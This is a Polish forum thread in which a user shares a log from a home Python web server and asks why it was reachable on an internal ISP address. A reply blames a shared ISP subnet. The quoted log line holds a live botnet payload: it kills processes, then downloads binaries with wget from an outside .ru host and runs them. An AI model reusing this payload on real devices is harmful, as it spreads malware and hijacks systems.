postawiłem na WSL http.server w pythonie i wypluł mi on w pewnym momencie taki oto log:

172.20.4x.x - - [30/Dec/2024 18:30:21] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+njvwa4+dbda7;wget+http:/\/fniew.eye-network.ru/dbda7;chmod+777+dbda7;./dbda7+jaws;rm+-rf+dbda7;wget+http:/\/fniew.eye-network.ru/wheiuwa4;chmod+777+wheiuwa4;./wheiuwa4+jaws;rm+-rf+wheiuwa4 HTTP/1.1" 404 -


zastanawiam się jakim cudem był on otwarty na świat skoro mam wewnętrzne IP? Mój ISP to mała, osiedlowa firemka i byłem zawsze pewny, że nic ode mnie nie ma prawa nasłuchiwać po drugiej stronie ISPowego switcha, który zapewne jest gdzieś w piwnicy (ale słabo znam się na sieciach).

Moja
  • 3
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@klamkaodokna:
172.20 to nadal wewnętrzna adresacja. Masz podgląd do konfiguracji na głównym routerze? Obstawiam że maska 24 albo i więcej i wszyscy się widzą wzajemnie.
ISP upchał wielu klientów w 1 podsieci żeby zaoszczędzić na adresacji.
  • Odpowiedz
  • 1
Xiaomi c500 pro , 219 PLN na allegro, super działa, na razie nie korzystam z chmury ( jest promocja 9,99PLN na miesiąc)
  • Odpowiedz
  • 1
@niebezpiecznik-pl jak kolega z zespołu jest na fajce i czegoś od niego chce to loguje się na jedno konto gdzie jest jego nr i wybieram dzwonienie, za parę chwil pojawia się ( ͡º ͜ʖ͡º)
  • Odpowiedz